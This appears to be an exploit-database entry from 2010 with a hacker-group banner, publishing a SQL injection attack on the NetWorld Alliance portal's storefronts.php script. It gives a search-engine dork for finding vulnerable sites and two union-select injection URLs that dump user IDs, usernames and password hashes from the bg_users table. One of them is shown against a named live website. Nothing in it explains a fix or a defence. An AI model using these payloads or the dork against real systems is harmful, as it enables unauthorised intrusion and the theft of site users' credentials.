NetWorld Alliance portal SQL Injection Vulnerability

2010-06-26T00:00:00
ID 1337DAY-ID-12950
Type zdt
Reporter Dr.0rYX
Modified 2010-06-26T00:00:00

Description

Exploit for php platform in category web applications

                                        
                                            ====================================================
NetWorld Alliance portal SQL Injection Vulnerability
====================================================


#
* EDB-ID:
#
 * CVE:
#
 * OSVDB-ID:
#
 * Author: Dr.0rYX and Cr3w-DZ
#
 * Published:
#
 * Verified:
#
 * Exploit Code:  
#
 * Vulnerable App:    
#
 
#
****************************************************************************************************
#
*           _______       ___________.__                     ___________      .__                  *
#
*      ____ \   _  \______\__    ___/|  |__           _____  \_   _____/______|__| ____ _____      *
#
*     /    \/  /_\  \_  __ \|    |   |  |  \   ______ \__  \  |    __) \_  __ \  |/ ___\\__  \     *
#
*    |   |  \  \_/   \  | \/|    |   |   Y  \ /_____/  / __ \_|     \   |  | \/  \  \___ / __ \_   *
#
*    |___|  /\_____  /__|   |____|   |___|  /         (____  /\___  /   |__|  |__|\___  >____  /   *
#
*         \/       \/                     \/               \/     \/                  \/     \/    *
#
*                                      .__  __             __                                      *
#
*      ______ ____   ____  __ _________|__|/  |_ ___.__. _/  |_  ____ _____    _____               *
#
*     /  ___// __ \_/ ___\|  |  \_  __ \  \   __<   |  | \   __\/ __ \\__  \  /     \              *
#
*     \___ \\  ___/\  \___|  |  /|  | \/  ||  |  \___  |  |  | \  ___/ / __ \|  Y Y  \             *
#
*    /____  >\___  >\___  >____/ |__|  |__||__|  / ____|  |__|  \___  >____  /__|_|  /             *
#
*         \/     \/     \/                       \/                 \/     \/      \/              *
#
*                                                        Pr!v8 Expl0iT AND t00l **                 *                                                                  
#
*                                      ALGERIAN HACKERS                                            *      
#
*********************************- NORTH-AFRICA SECURITY TEAM -*************************************
#
 
#
[!]            NetWorld Alliance portal SQL Injection Vulnerability
#
[!] Author    : Dr.0rYX and Cr3w-DZ
#
[!] MAIL      : [email protected]<mailto:[email protected]>  &  [email protected]<mailto:[email protected]>
#
 
#
***************************************************************************/
#
 
#
[ Software Information ]
#
 
#
[+] Vendor : http://www.networldalliance.com/
#
[+] script   : NetWorld Alliance portal
#
[+] Download : http://www.networldalliance.com/contact (sell script )
#
[+] Vulnerability : SQL injection
#
[+] Dork : inurl:"storefronts.php?sf_id=="
#
 
#
**************************************************************************/
#
[ Vulnerable File ]
#
 
#
http://server/storefronts.php?sf_id=[N.A.S.T ]
#
 
#
 
#
[ Exploit 1 ]
#
 
#
http://server/storefronts.php?sf_id=-1+and+1=0+Union+All+Select+1,concat(id,0x3a,username,0x3a,password)+from+bg_users--
#
 
#
 [ Exploit 2 ]
#
 
#
 http://server/storefronts.php?sf_id=-1+union+all+select+1,concat(id,0x3a,username,0x3a,password)+from+bg_users--
#
 
#
[ ExAMPLE ]
#
 
#
http://kioskmarketplace.com/storefronts.php?sf_id=-1+union+all+select+1,concat%28id,0x3a,username,0x3a,password%29+from+bg_users--
#
 
#
[  GReet ]
#
 
#
[+] :claw  , exploit-db.com , ALL HACKERS MUSLIMS



#  0day.today [2018-01-05]  #